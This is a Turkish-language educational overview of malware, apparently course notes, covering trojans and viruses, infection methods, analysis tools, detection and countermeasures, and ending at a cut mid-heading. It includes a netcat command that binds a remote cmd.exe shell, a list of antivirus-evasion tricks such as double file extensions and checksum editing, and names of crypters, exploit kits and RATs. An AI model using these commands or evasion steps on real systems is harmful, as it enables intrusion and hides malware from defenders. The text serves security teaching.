Kötü Amaçlı Yazılım (Malware) Tehdidi

ismail.sen0

1.1. Kötü Amaçlı Yazılım (Malware) Tehdidi

Kötü Amaçlı Yazılım, bilgisayar sistemlerine zarar verip veya devre dışı bırakıp hırsızlığı veya dolandırıcılığı amaçlayan saldırgana sınırlı veya tam kontrol hakkı veren kötücül bir yazılımdır. [16]

 

Truva Atı (Trojan Horse), virüs, arka kapı (backdoor), solucanlar (worms), rootkit, casus yazılım (spyware), fidye yazılımı (ransomware), botnet, reklam yazılımı (adware), şifreleyici (crypter) Zararlı Yazılım (Malware) örnekleridir.

 

Zararlı Yazılım (Malware) Bulaştırma Yöntemleri: Anlık Mesajlaşma Uygulamaları, IRC (Internet Relay Chat/İnternet Aktarmalı Sohbet), Harici (removable) cihazlar, ek dosyalar, Şikâyetçi çalışan tarafından programlanan yazılımı meşrulaştırma, tarayıcı ve sunucu yazılım hataları (bugs), NetBIOS (Dosya Paylaşımı), Taklit (fake) programlar, güvensiz siteler ve bedava yazılım, İndirilen dosyalar, oyunlar, ekran koruyucular olabilir. [17]

 

Web’te Zararlı Yazılım (Malware) Bulaştırmak için Kullanılan Genel Teknikler:

 

SEO/Siyah Şapka Arama Motoru İyileştirmesi (Blackhat Search Engine Optimization): Arama sonuçlarında yüksek oranda Zararlı Yazılım (Malware) sayfaları sıralamadır.

 

Sosyal Mühendislik Tıklama Doğrultması (Social Engineered Click-jacking):  Kullanıcıyı masum görünüşlü web sayfalarıyla kandırmaktır.

 

Zararlı Reklam (Malvertising):  Yasal yüzlerce yüksek trafik içeren siteleri gösteren reklam ağlarına Zararlı Yazılım (Malware) gömmektir.

 

Mızrakla Siteleri Oltalama (Spearphishing Sites):  Oturum bilgilerini çalmak için yasal kurumları taklit etmektir.

 

Anlaşmalı Yasal Web Siteleri (Compromised Legitimate Websites):  Sunucuya masum ziyaretçilere bulaşan Zararlı Yazılım (Malware) gömmedir.

 

Fark Etmeyen Yerlerden Yapılan İndirmeler (Drive-by Downloads):  Bir web sayfası ziyaret edilmesi sonucu Zararlı Yazılım (Malware) kurmak için tarayıcı yazılımındaki hatadan faydalanmaktır.

 

Kötü Amaçlı Yazılım (Malware) Analiz Süreci:

  • Test Ortamı (testbed) Hazırlama adımları;
  • Sanal Makine (VMware, Hyper-V vb.) kurulur
  • Sanal makineye konuk (guest) işletim sistemi kurulur
  • NIC (Network Interface Card/Ağ Arayüz Kartı) “host only” modunda yapılarak ağdaki sistem ayrılır
  • Paylaşımlı dosyalar ve konuk ayırması (guest isolation) devre dışı bırakılır
  • Guest işletim sistemine Zararlı Yazılım (Malware) kopyalanır.

 

Test ortamı hazırlandıktan sonra Zararlı Yazılım (Malware) aktif değilken sabit (static) bir analiz yapılır. BinText gibi dizi (string) alma araçları yardımıyla binaryde bulunan metin  değerleri ve UPX gibi sıkıştırma (compression) ve açma (decompression) araçları yardımıyla kullanılan paketleme ve sıkıştırma tekniği hakkında bilgi toplanır. Ağ bağlantısı kurulup herhangi bir hata verip vermediği kontrol edilir. Virüs çalıştırılıp Process Monitor ve Process Explorer gibi süreç gözleme araçları yardımıyla sistem bilgisi ve işlemleri izlenir. NetResident ve TCPView gibi bağlantı ve log paketi içeriği gözleme araçları kullanılarak ağ trafik bilgisi kaydedilir. RegShot gibi kayıt gözleme araçları yardımıyla eklenmiş dosyalar, üretilmiş (spawn) işlemlerin, kayıt defterindeki değişimler belirlenir. OllyDbg ve ProcDump gibi hata ayıklama araçları kullanılarak servis talepleri ve DNS tabloları bilgisi, gelen, giden bağlantı girişimleri bilgisi toplanır. IDA Pro, Zararlı Yazılım (Malware) analiz aracıdır. VirusTotal şüpheli dosyaları inceleyip virüsleri, wormleri, trojanları vb. tespit etmeyi kolaylaştıran bedava bir çevrimiçi Zararlı Yazılım (Malware) test etme servisidir.

 

1.1.1. Truva atı (trojan)

Hard diskteki dosya dizinini mahvetmek gibi kontrolü ele geçirip zarara yol açabilecek şekilde içerideki zararsız programlama veya veriyi alan kötücül veya zararlı bir kod içindeki programdır. Kullanıcıların belirli ön tanımlı eylemleri üzerinde aktif olurlar. Antivirüsün devre dışı kalması, bilinmeyen sayfalara yönlendirilme gibi anormal sistem ve ağ eylemleri Trojan göstergesidir. Truva atları gizli veriyi iletmek için kurbanla saldırgan arasında gizli iletim kanalı oluştururlar. [18]

 

İstismarcıların Truva Atlarını Kullanma Şekli:

  1. İşletim sistemindeki önemli dosyaları silmek veya değiştirmek
  2. Güvenlik duvarları ve antivirüsü devre dışı bırakmak
  3. DOS saldırıları oluşturmak için trafiği taklit etmek
  4. Uzaktan erişim sağlamak için arka kapı (backdoor)lar yaratmak
  5. Kurbanın ekran resmini, sesini ve videosunu kaydetmek
  6. Saldırıları aktarmak için bir vekil (Proxy) sunucu olarak kurbana bulaştırmak
  7. İstenmeyen e-posta gönderip e-posta mesajlarını patlatmak için kurbanı kullanmak
  8. DDoS saldırıları yapmak için kurbanı kullanmak
  9. Casus (Spyware), Reklam yazılımları (adware) ve kötücül dosyaları indirmek
  10. Klavye Dinleyicileri (Keylogger) kullanarak kredi kartı bilgisi, güvenlik kodları, parolalar gibi bilgileri çalmak

 

Truva Atı Yapma Seti kullanarak yeni bir Truva Atı paketi yaratılır. Hedef sisteme kötücül kod kuran Truva Atı elenmiş paketteki bir parça olan damlalık (dropper) (lamel) oluşturulur.  Kurbana Truva Atını yüklemek için Paket yapıcı (Wrapper) araçları kullanan paket yaratılır. Truva Atı bulaştırılır. Damlalık (Dropper) çalıştırılır. Zarar veren program çalıştırılır.

 

Bir paket yapıcı oyunlar, ofis uygulamaları gibi masum görünümlü “.exe” uygulamalarıyla çalıştırılabilen bir Truva atına bağlanır (bind). Paketlenmiş uygulama çalıştırıldığında arka planda Truva Atı yüklenir. Önde de paketlenen uygulama çalışır. İki program bir dosyaya paketlenmiştir. Saldırgan kullanıcı izlerken Truva Atı yükleyecek bir doğum günü kutlama mesajı yollar. “Dark Horse Trojan Virus Maker” trojan yapmak için kullanılan bir araçtır.

Kriptolayıcı (Crypter) virüsleri, antivirüslere kolayca yakalanmamak için klavye tutucuları (keylogger) veya herhangi bir dosyayı saklayan hackerların kullandığı bir yazılımdır.

  • AIO FUD Crypter,
  • Hidden Sight Crypter,
  • Galaxy Crypter,
  • Criogenic Crypter,
  • Heaven Crypter,
  • SwayzCryptor

Gibi uygulama örnekleri vardır.

Sömürme Seti (Exploit Kit) veya Suç yazılımı (Crimeware) seti hedef sistemdeki Truva atları (trojanlar), Casus Yazılımlar (spywarelar), arka kapılar (backdoor), botlar, arabellek taşması kodları (buffer overflow scripts) gibi sömürücüleri (exploit) ve yükleri (payload) ileten bir platformdur.

  • Infinity,
  • Phoenix Exploit Kit,
  • Blackhole Exploit Kit,
  • Bleedinglife,
  • Crimepack

Gibi uygulama örneleri vardır.

 

Antivirüsü Atlatma Teknikleri:

  1. Truva atı (trojan) dosyası çok parçaya bölmek ve tek bir dosya olarak sıkıştırmak (zip)
  2. Her zaman kendi Truva atını (trojan) yazıp uygulamaya gömmek
  3. Truva atının (trojan) dizimini (syntax) değiştirmek: EXE’yi VB koduna (script) dönüştürmek, “.EXE” uzantısını “.DOC.EXE, PPT.EXE” veya “PDF.EXE” olarak değiştirmek (Windows varsayılan olarak bilinen uzantıları gizler bu yüzden sadece .DOC, .PPT ve .PDF’i gösterir)
  4. Onaltılı (Hex) Düzenleyici (editör) kullanarak Truva atının (trojan) içeriğini değiştirmek ayrıca sağlamasını (checksum) değiştirmek ve dosyayı şifrelemek
  5. Web’ten indirilen Truva atılarını (trojan) kullanmamak (antivirüs kolaylıkla tespit edebilir)

 

Trojan Çeşitleri:

  • VNC Trojan,
  • HTTP Trojan,
  • ICMP Trojan,
  • Veri Gizleyen (Data Hiding) Trojan,
  • Yıkıcı (Destructive) Trojan,
  • HTTPS Trojan, Botnet Trojan,
  • Proxy Sunucu Trojan,
  • Uzaktan Erişim Trojan,
  • FTP Trojan,
  • İçerik Bozan (Defacement) Trojan,
  • E-Bankacılık Trojan,
  • Gizli Kanal (Covert Channel) Trojan,
  • Bildirim (Notification) Trojan,
  • Mobil Trojan,
  • Kabuk Komutu (Command Shell) Trojan.

 

Komut Kabuğu Truva Atı( Command Shell Trojanlar): Kurban üstünde komut kabuğunun uzaktan kontrolünü sağlar. Kurbana saldırganın bağlanması için bir port açan Truva atı sunucusu yüklenir. İstemci saldırgan makinesinde kurulur. Bu kurbanda bir omut kabuğu çalıştırmak için kullanılır. CMD’ye “nc ip port ve nc –L –p port –t –e cmd.exe” komutları yazılır.

 

Tahrif Truva Atları (Defacement Trojanlar): Kaynak düzenleyiciler (Resource Editors), herhangi bir Windows programındaki simgeleri (icons), logoları, bit eşlemleri (bitmaps), dizileri (strings) değiştirmeyi, almayı, düzenlemeyi, görmeyi sağlar. Restorator bunu yapan bir araçtır.

 

Bot Ağı Truva Atları (Botnet Trojanlar): Komuta ve Kontrol Merkezi (Command and Control –C&C- Center) aracılığıyla kontrol edilen ağ botları oluşturmak için geniş coğrafik bölgedeki birçok bilgisayara bulaşır. DoS, spamleme, tıklama dolandırıcılığı (click fraud) ve finansal bilgi hırsızlığı gibi çeşitli saldırılar yapmak için kullanılır. ChewBacca (Tor tabanlı Botnet Trojan), Skynet, CyberGate bunlar için kullanılır.

 

Vekil Sunucu Truva Atları (Proxy Server Trojanlar): Uzaktaki saldırganların internete bağlanmak için bir vekil sunucu olarak kurbanı kullanmasına izin veren bağımsız bir uygulamadır. Bulaştığında kurbanın bilgisayarında gizli bir vekil sunucu sunucu başlatır. W3bPrOxy Tr0j4nCr34t0r birçok istemcide çoklu bağlantıyı destekleyen ve IP ve portları Truva atı sahibine bildiren bir vekil sunucudur.

 

FTP Trojanlar: Kurbana FTP portlarını açan FTP sunucu yükler. Saldırgan daha sonra FTP ile kurbanın bilgisayarındaki herhangi bir dosyayı indirmek için kurbana bağlanabilir.

 

VNC Truva Atları: VNC (Virtual Network Computing/Sanal Ağ Bilişimi), herhangi bir ağ sunucusu üzerinde çalışan grafik arayüz uygulamalarına herhangi bir başka ağ üzerindeki bir bilgisayardan kolaylıkla ve hızlı erişerek bu uygulamaları kullanabilmemizi ve yönetmemizi sağlayan platform bağımsız bir yapıdır. Sisteme bulaştırılmış VNC sunucu programını başlatır. Saldırgan VNC görüntüleyiciyi (viewer) kullanarak kurbana bağlanır. Antivirüsleri kullanarak tespit etmek zordur. Hesperbot, keystroke loglama, ekran resmi oluşturma, video yakalama, uzaktan proxy kurma gibi işlevsel özelliklere sahip bir bankacılık Trojanıdır. Gizli bir VNC sunucu oluşturur.

 

HTTP/HTTPS Trojanlar: Güvenlik duvarını atlatıp HTTP bir tünelin ters yönünde (reverse way) çalışırlar. İç hostta çalıştırılıp önceden tanımlanan bir zamanda alt programlar (child program) üretirler (spawn). Alt program güvenlik duvarına bir kullanıcı gibi görünür böylece internet erişimine izin verilir. HTTP RAT, reklam gösterir, kişisel veri/keystrokeları kaydeder, istenmeyen dosyalar indirir, programları/sistemleri devre dışı bırakır, internet bağlantısı basar (flood) ve tehditleri yayar, tarayıcı eylemlerini izler ve internet tarayıcısını ele geçirir, spyware belirleme ve kaldırma ile ilgili sahte talepler yapar. Shttpd Truva Atı (HTTPS/SSL), herhangi bir programa gömülebilen küçük bir HTTP sunucudur. Gerçek bir programla paketlenebilir (chess.exe, oyun), çalıştırıldığında bilgisayarı gizli bir web sunucuya dönüştürür.

 

ICMP Tünelleme: ICMP (Internet Control Message Protocol-İnternet Kontrol Mesaj Protokolü) Gizli kanallar, tespit edilemeyen bir protokolde veri gizleyebilen yöntemlerdir. Bir protokol başka bir protokol üzerinden taşınır. ICMP tünelleme, payload taşıyıp gizlice kurbanın makinesinde kontrol veya erişim sağlamak ICMP echo-request ve reply kullanır. CMD’ye icmpsend kurban ip’si ve icmpsrv –install komutları ile kullanılır. [15]

 

Remote Access (Uzaktan Erişim) Truva Atları: Uzaktan masaüstü erişimi gibi çalışır. İstilacı uzaktaki sisteme arayüz (GUI) erişimi sağlar. Truva atı 80 portu üzerinden bağlanır. Optix Pro, MoSucker, BlackHole RAT, SSH – R.A.T, njRAT, Xtreme RAT, SpyGate – RAT, Punisher RAT, DarkComet RAT, Pandora RAT, HellSpy RAT, ProRat, Theef bunun için kullanılır. Hell Raiser kurbanın sistemine erişim sağlar ve resimler yollar, sohbet (chat) mesajları açar, kurbanın sisteminden/kurbanın sistemine dosya alır/gönderir, kurbanın işlemlerini izler. Atelier Web Remote Commander (AWRC) makinede yardımcı yazılım kurmaksızın uzaktaki makineye uzaktan bağlantı kurar.

 

Gizli Kanal Truva Atları (Covert Channel Trojan): Çeşitli sömürü teknikleri, ağ erişim kontrol sistemi tarafından izin verilmiş veri akışlarında rastgele seçilmiş veri iletim kanalları (arbitrary data transfer channels) yaratma sağlar. İç ağdan ve tersinden dışarıdaki sunucu bağlantısı almayı sağlar. Dışarıdaki sunucu ve iç ağdaki bölme (box) arasında TCP veri akışı (SSH, SMTP, POP vb.) sağlayarak TCP/UDP/HTTP CONNECT/POST kanalı düzenler.

 

E-Bankacılık Truva Atları: Şifrelenmeden önce kurbanın hesap bilgilerini ele geçirip Truva atı komuta kontrol merkezine gönderir. Kredi kartı bilgilerini çalıp e-posta, FTP, IRC veya başka yöntemler kullanarak uzaktaki istilacıya iletir.

 

E-Bankacılık Truva Atlarının Çalışması: TAN Yakalayıcı (Grabber) à Trojan, kullanıcının girdiği İşlem Doğrulama Numarası (Transaction Authentication Number/TAN) değerini ele geçirir. TAN, bankanın reddedeceği rastgele bir sayıyla değiştirilir. Saldırgan kullanıcı oturum detaylarıyla ele geçirdiği TAN’ı kötüye kullanabilir. HTML Enjeksiyonu à Truva atı, e-bankacılık sayfalarında sahte form alanları oluşturur. Ek alanlar kart numarası ve doğum tarihi gibi ekstra bilgi elde eder. Saldırgan taklit edip kurban hesabıyla anlaşmak için bu bilgiyi kullanabilir. Form Yakalayıcı à Truva atı, kurban tarayıcısının POST taleplerini ve yanıtlarını inceler. Parmak Doğrulama İlerlemesi (Scramble Pad Authentication) ile anlaşır. Truva atı kullanıcı müşteri numarası ve kişisel erişim kodunu girerken parmak doğrulama ilerlemesini ele geçirir. ZeuS ve SpyEye bilgisayarlara web tarayıcılar ve korumalı bellek (protected storage) aracılığıyla bulaşıp banka ve kredi kartı hesabı bilgisi, ftp verisi, diğer gizli bilgileri çalar. SpyEye otomatik olarak ve hızlıca çevrimiçi işlem başlatabilir. Citadel Builder, Ice IX bu işlem için kullanılabilecek diğer araçlardır.

 

Yıkıcı (Destructive) Trojanlar: M4sT3r tehlikeli ve yıkıcı bir Truva atı çeşididir. Bu Truva atı tüm yerel ve ağ sürücülerini biçimlendirir (format). Çalıştırıldığında işletim sistemini yok eder. Kullanıcı işletim sistemini ön yükleyemez (boot).

 

Bildirim (Notification) Truva atları: Kurbanın IP adresinin lokasyonunu saldırgana gönderir. Kurban ne zaman internete girse saldırgan bildirim alır. Çeşitleri: SIN Notification à Doğrudan saldırganın sunucusuna bildirim gönderir. ICQ Bildirimi à ICQ (mesajlaşma programı) kanallarını kullanarak saldırgana bildirim gönderir. PHP Bildirimi (Notification) à Saldırganın sunucusundaki PHP (web programlama dili) sunucuya bağlanarak veri gönderir. E-Posta Bildirimi (Notification) à E-posta aracılığıyla bildirim gönderir. Net Send à net send komutuyşa bildirim gönderir. CGI Bildirimi (Notification) à Saldırganın sunucusundaki PHP sunucuya bağlanarak veri gönderir. IRC Bildirimi (Notification) à IRC kanalları kullanılarak bildirim gönderir.

 

Veri Gizleyen Trojanlar (Şifrelenmiş Trojanlar): Sistemdeki dosyaları şifreler ve bilgiyi kullanılmaz hâle getirir. Saldırganlar dosyaların şifresini kaldırmak için fidye talep ederler veya kurbanı bir şey satın almaya zorlarlar.

 

Truva Atı Analizi:

Neverquest; Yeni bir bankacılık trojanıdır. Kurbanların gezindiği web sayfalarındaki özellikli anahtar sözcükleri araştırarak hedef siteleri belirleyebilir. Zararlı Yazılım (Malware) sisteme bulaştıktan sonra Virtual Network Computing (VNC) ve SOCKS vekil sunucu (proxy server) yardımıyla makinenin kontrolünü saldırgana verir. Trojan birkaç bankacılık sitesini hedef alıp müşterilerin sitelerde girdikleri oturum bilgileri gibi gizli bilgileri çalar. Ayrıca Twitter gibi sosyal medyalarla ilişkili oturum bilgilerini çalıp kendi sunucuna yollar. Sisteme bulaşır bulaşmaz “%APPDATA%” içindeki bir “.dat” uzantısıyla rastgele isimli bir DLL indirir. Sonra otomatik olarak “Software\Microsoft\Windows\CurrentVersion\Run\” altına bir anahtar ekleyip “regsvr32.exe /s [DLL PATH (yolu)]” kullanarak bu DLL’i çalıştırır. Kötücül kodunu çalışan proseslerin içine enjekte etmeye çalışır ve iexplorer.exe veya firefox.exe gibi tarayıcı proseslerini bekler. Kurban bu tarayıcılarda herhangi bir siteye girer girmez Truva atı sunucusundan şifrelenmiş (encrypted) yapılandırma (configuration) dosyası talep eder. Truva atı taleplerden sonra kullanılacak bir ID numarası (unique ID number) oluşturur. Yanıt aPLib sıkıştırma ile şifrelenir. Yanıt verisi açma (decompression) programı takibinde “AP32” metinine eklenir. Yapılandırma dosyası büyük miktarda JavaScript kodu, banka siteleri, sosyal medya siteleri, finansal anahtar sözcükler listesi içerir. Yapılandırma dosyasındaki JavaScript kodu gizli bilgiyi çalmak için banka sitesinin sayfa içeriklerini değiştirmede kullanılır. Truva atı web sayfasında anahtar sözcüklerden herhangi birini bulursa tüm bağlantıyı ve kullanıcının girdiği bilgiyi çalıp saldırgana yollar. Truva atı kullanıcı adı ve şifre içeren tüm URL takibinde bir ID numarası (unique ID number) yollar. Ayrıca saldırgana bir formatta aPLib ile sıkıştırılmış tüm web sayfası içeriklerini gönderir.

 

Truva Atlarını Belirleme:

Şüpheli açık portları taramak: Truva atları İşleyicilere (handlers) geri bağlanmak için kurbandaki kullanılmayan portları açarlar. Bilinmeyen veya şüpheli IP adresleriyle kurulan bağlantıya bakılır. TCPView, yerel ve uzaktaki adresler, TCP bağlantı durumları gibi sistemdeki tüm TCP ve UDP uç noktalarının (endpoints) detaylı listelerini gösterir. CurrPorts, yerel bilgisayardaki tüm UDP ve açık TCP/IP portlarının listesini gösteren ağ gözlem sistemi (monitor) yazılımıdır. Şüpheli çalışan süreçeleri (proccess) taramak à Trojanlar kendilerini gerçek Windows servisleri gibi gösterip gizlenirler veya tespit edilmemek için süreçleri gizlerler. Bazı Trojanlar çeşitli süreçelere (proccess) (explorer.exe  veya web tarayıcılar gibi) enjekte olmak için PEler (Portable Executable/Taşınıp Çalıştırılabilen) kullanırlar. Süreçeler (proccess) yasal görünüp masaüstü güvenlik duvarlarını atlatmaya yardımcı olurlar. Trojanlar süreçeleri (proccess) gizlemek için rootkit yöntemleri de kullanabilirler. İşlem Görüntüleyici (Process Monitor), sistem dosyası, kayıt defteri ve tehdit eylemi gösteren Windows ağ gözlem aracıdır.

 

What’s Running, prosesleri araştırıp performans ve bellek kullanımı, işlemci kullanımı, işleyiciler (handles) gibi kaynak kullanım verilerini (resource usage data) alır. Yüklenmiş dlller, süreçelerte (proccess) çalışan servisler, işlemle ilişkili IP bağlantıları hakkında bilgi verir.

 

Şüpheli kayıt defteri girdilerini taramak à Windows otomatik olarak ‘Run’, ‘RunServices’, ‘RunOnce’, RunServicesOnce’, ‘HKEY_CLASSES_ROOT\exefile\shell\open\command “%1” %*.’ kayıt defteri bölümleri içinde talimatlar çalıştırır. Şüpheli girdilerin kayıt defteri değerlerini tarayarak Truva atı tespit edilebilir. Truva atı kötücül eylemler yapmak için bu kayıt defteri bölümlerine talimatlar girer. RegScanner, kayıt defteri tarar, özellikli arama kriteriyle eşleşen kayıt defteri değerlerini bulup listeler. Bilgisayara kurulmuş şüpheli cihaz sürücülerini taramak à Truva atı güvenilmeyen kaynaklardan indirilen cihaz sürücüleriyle beraber kurulur. Bu sürücüler tespit edilmemek için kalkan görevi görürler. Şüpheli cihaz sürücülerini tarayıp gerçek olup olmadığı ve asıl siteden indirilip indirilmediği belirlenir. Run à msinfo32 à Software Environment à System Drivers ile cihaz sürücüleri görülür. DriverView, sistemde yüklü cihaz sürücülerini listeler.

 

Şüpheli Windows servislerini taramak à Windows servislerinde üretilmiş Truva atı kurbana uzaktan kontrol sağlayıp kötücül talimatları işlerler. Truva atı tespit edilmemek için gerçek Windows servisi gibi görünmek için süreçeleri (proccess) yeniden isimlendirirler. Trojanlar süreçeleri (proccess) gizlemek için “HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services” kayıt defteri anahtarlarını manipüle eden kök seti (rootkit) teknikleri kullanırlar. Windows Servis Yöneticisi (Windows Service Manager (SrvMan)) Windows servisleriyle ilgili tüm görevleri (tasks) sadeleştirir. Windows’u yeniden başlatmadan servisler (hem Win32 hem de Legacy Driver (eski sürücü)) yaratabilir, var olan servisleri silebilir ve servis yapılandırmasını değiştirebilir.

 

Şüpheli başlangıç (startup) programlarını taramak à Başlangıç programı kayıt defteri girdileri kontrol edilir.

Otomatik yüklenmiş cihaz sürücüleri kontrol edilir (C:\Windows\System32\drivers). boot.ini veya bcd (bootmgr) girdileri kontrol edilir. Otomatik başlatılan Windows servisleri kontrol edilir (Run à services.msc à Startup Type ile sıralama). Başlangıç klasörü kontrol edilir (C:\ProgramData\Microsoft\Windows\StartMenu\Programs\Startup ve C:\Users\(kullanıcıadı)\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup).

Windows 8 Başlangıç Programı Kayıt Defteri Girdileri:

Şekil 2‑6 Kayıt Defteri Girdileri

Güvenli Çalıştırma (Security AutoRun), Windows başlatıldığında otomatik yüklenen tüm uygulamaları listeler.

Şüpheli dosyaları ve klasörleri taramak à Truva atları normalde sistem dosyalarını ve klasörlerini değiştirirler. Sistem değişikliklerini belirlemek için kullanılan araçlar:

SIGVERIF; Microsoft imzalı önemli dosyaların bütünlüğünü kontrol eder. Run>sigverif ile başlatılır.

FCIV; Dosyalar için MD5 veya SHA1 özet şifrelemesi yürüten komut satırı programıdır. http://download.microsoft.com adresinden indirilebilir.

TRIPWIRE; Önemli sistem dosyalarındaki değişiklikleri tarayıp bildiren hızlı ve güvenilir (enterprise class) bir bütünlük sağlayıcısıdır (integrity verifier). FastSum, dosyaların bütünlüğü kontrol etmek için kullanılır. MD5 checksum (sağlama) algoritmasına göre checksumları hesaplar. WinMD5, dosyaların MD5 özetlerini (fingerprints/parmak izleri) hesaplayan bir Windows yazılımıdır. Bu parmak izleri dosyanın bozulmamasını sağlamak için kullanılır.

 

Şüpheli ağ eylemlerini taramak

Trojanlar işleyicilere geri bağlanıp gizli bilgiyi gönderirler. Kötücül uzaktaki adreslere giden ağ trafiğini izlemek için ağ tarayıcılar ve paket dinleyiciler (sniffers) kullanılır. Capsa Network Analyzer, ağda Truva atı eylemleri olup olmadığı kontrol etmeye yarayan detaylı bilgiyi sağlayan sezgisel (intuitive) ağ analizi aracıdır.

 

Truva Atlarına Karşı Önlemler:

  1. Bilinmeyen göndericilerden alınan e-posta eklerini açmamak
  2. Sunucudaki ve güvenlik duvarındaki gereksiz portları kapatmak
  3. Anlık mesajlaşma ile iletilen programları kabul etmemek
  4. Zayıf, varsayılan yapılandırma ayarlarını sağlamlaştırıp protokoller ve servisler dâhil kullanılmayan işlevsellikleri devre dışı bırakmak
  5. Tuhaf bağlantı noktaları (port) veya şifrelenmiş trafik için iç ağ trafiğini izlemek
  6. Güvenilmeyen kaynaklardan uygulama indirip çalıştırmamak
  7. İşletim sistemlerinin ve uygulamaların yamalarını kurup güvenlik güncellemelerini yapmak
  8. Kullanmadan önce CDleri ve DVDleri antivirüs yazılımıyla taramak
  9. Kötücül uygulamaların kurulumunu önlemek için masaüstü ortamındaki izinleri sınırlandırmak
  10. Önceden yazılan programları veya kodları (scripts) çalıştırmamak ve körü körüne komutlar yazmamak
  11. Checksumlar (sağlamalar), denetleme ve port tarama aracılığıyla yerel iş istasyonu (workstation) dosya bütünlüğünü sağlamak
  12. Sunucu taraflı antivirüs, güvenlik duvarı ve izinsiz giriş tespiti (intrusion detection/IDS) yazılımı çalıştırmak

 

TrojanHunter, trojanlar, spyware, adware ve otomatik numara çeviriciler (dialers) gibi tüm Zararlı Yazılım (Malware) türlerini saptayan ileri düzey bir Zararlı Yazılım (Malware) tarayıcıdır. Bellek, kayıt defteri, ini dosyası tarama özellikleri vardır. Emsisoft Anti-Zararlı Yazılım (Malware), virüslere, trojanlara, spyware’a, adware’a, wormlere, botlara, keyloggerlara, rootkitlere karşı PC koruması sağlar. Antivirüs ve antiZararlı Yazılım (Malware)’ın birleştirilmiş hâlidir. Dosya koruması, davranış (behaviour) engelleyici ve gezinme (surf) koruması özellikleri vardır.

 

1.1.2. Virüs

Başka bir programa, bilgisayar ön yükleme bölümüne (boot sector) veya dokümana yapışıp kendini kopyalayan bir programdır. Dosya indirmeleri, bulaşmış disk/bellek cihazı (flash drive) ve e-posta ekleriyle iletilirler. Virüsler; başka programa bulaşma, veri değiştirme, kendini dönüştürme, dosyaları ve programları bozma, kendini şifreleme, kendi kendine çoğalma gibi özelliklere sahiptir. [19]

Virüs enfeksiyon aşamasında çoğalıp sistemdeki “.exe” dosyasına yapışır. Saldırı aşamasında çalışıp sistemi bozmak için tetikleyici durumlarla (trigger events) programlanır.

 

Bilgisayar Virüsü Yaratma Sebepleri:

  1. Rakiplere zarar vermek
  2. Finansal çıkarlar
  3. Proje Araştırmaları
  4. Şaka yapmak
  5. Vandallık
  6. Siber Terörizm
  7. Politik mesaj vermek

 

Virüs Saldırısı Belirtileri:

Proseslerin daha fazla kaynak ve zaman alması, Görüntü yokken bilgisayar sesleri, Sürücü etiketi değişimleri (Drive label changes), İşletim sistemi yükleyememe, Programlar başlatıldığında bilgisayarın yavaşlaması, Antivirüs uyarıları (alerts), Sık sık bilgisayar donmaları veya hatalarla karşılaşma, Eksik dosyalar ve klasörler, Sık sık hard diske erişme,

Tarayıcı donmaları.

 

Virüs Bulaşma Şekilleri: Kaynağını kontrol etmeksizin dosyaları kabul edip indirmek, Bulaşmış e-posta eklerini açmak, Korsan yazılım yüklemek, Yazılım eklentilerinin yeni sürümlerini güncelleyip yüklememek, En güncel Antivirüs uygulaması çalıştırmamak.

Aldatmaca (Hoaxes) Virüsü, virüs eklentileri içerebilecek var olmayan bir virüsle ilgili raporlar oluşturan yanlış (false) alarmlardır. Görüntülenmemesi gereken bir e-posta yayan uyarı mesajları birinin sistemine zarar verir.  Saldırganlar Zararlı Yazılım (Malware)ları bir antivirüs gibi gösterip kullanıcının kurmasını sağlayabilirler.

 

Virüs Çeşitleri:

  • Sistem veya Ön Yükleme Bölümü (Boot Sector) Virüsleri,
  • Gizli Virüs/Tünelleme Virüsü,
  • Şifrelenmiş Virüs,
  • Çok Biçimli (Polymorphic) Virüs,
  • Başkalaşmış (Metamorphic) Virüs,
  • Dosya Üstüne Yazılan (Overwriting File) veya Boşluk (Cavity) Virüsü,
  • Dosya Virüsleri, Küme (Cluster) Virüsleri,
  • Seyrek Yerleşik Virüs (Sparse Infector Virus),
  • Eş (Companion) Virüs/Gizlenen (Camouflage) Virüs,
  • Kabuk (Shell) Virüsü, Dosya Uzantı Virüsü,
  • Çok Parçalı (Multipartite) Virüs,
  • Makro (Macro) Virüs,
  • Eklenti (Add-on) Virüsü,
  • Zorla Giren (Intrusive) Virüs,
  • Doğrudan Eylem veya Geçici (Direct Action or Transient) Virüs,
  • Sonlanıp Yerleşen (Terminate and Stay Resident) Virüs (TSR).

 

Sistem veya Ön Yükleme Bölümü (Boot Sector) Virüsleri

Hard diskteki MBR’ı (Master Boot Record/Ana Ön Yükleme Kaydı) başka bir lokasyona taşıyıp MBR’ın yerine kendini kopyalar. Sistem ön yüklendiğinde virüs kodu çalışır ve asıl MBR’ın kontrolü ele geçirilir.

 

Dosya Virüsleri

COM, EXE, SYS, OVL, OBJ, PRG, MNU, BAT dosyaları gibi sistemde çevrilen ya da çalıştırılan dosyalara bulaşır. Dosya virüsleri doğrudan eylem (direct-action/non-resident (yerleşmeyen)) ya da belleğe yerleşen (memory-resident) olabilir.

 

Çok Parçalı (Multipartite) Virüs

Aynı anda boot sector ve çalıştırılabilir dosyalara bulaşır.

 

Makro (Macro) Virüs

Microsoft Word veya Excel tarafından oluşturulan dosyalara bulaşır. Çoğu makro virüsü makro dili olan Visual Basic for Applications (VBA) kullanılarak yazılır. Şablonlara bulaşabilir veya bulaştığı dokümanları şablon dosyalarına dönüştürebilir.

 

Küme (Cluster) Virüsleri

Kullanıcılar veya sistem süreçeleri (proccess) üzerinde asıl program yerine virüs kodu çalıştırmak için dizin tablosu girdilerini değiştirir. Sistemde tüm programlara bulaşan sadece bir virüs kopyası vardır. Sistemdeki herhangi bir program çalıştırıldığında devreye girip asıl programın kontrolünü ele geçirir.

 

Gizli (Stealth) Virüsler/Tünelleme Virüsler

İşletim sistemi taleplerini alıp antivirüs yazılımlarını atlatır. Bir virüs işletim sistemi yerine antivirüs yazılımının dosya okuma taleplerini alıp talepleri kendine geçirerek gizlenebilir. Virüs o zaman dosyanın bulaşmamış sürümünü antivirüs yazılımına gönderir böylece dosya temizmiş gibi görünür.

 

Şifrelenmiş (Encryption) Virüsler

Kodu şifrelemek için basit bir şifreleme kullanır. Virüs her bir bulaştığı dosya için farklı bir anahtarla şifrelenir. AV (antivirüs) tarayıcı imza belirleme yöntemlerini (signature detection methods) kullanarak bu virüsleri doğrudan bulamaz.

 

Çok Biçimli (Polymorphic) Kod

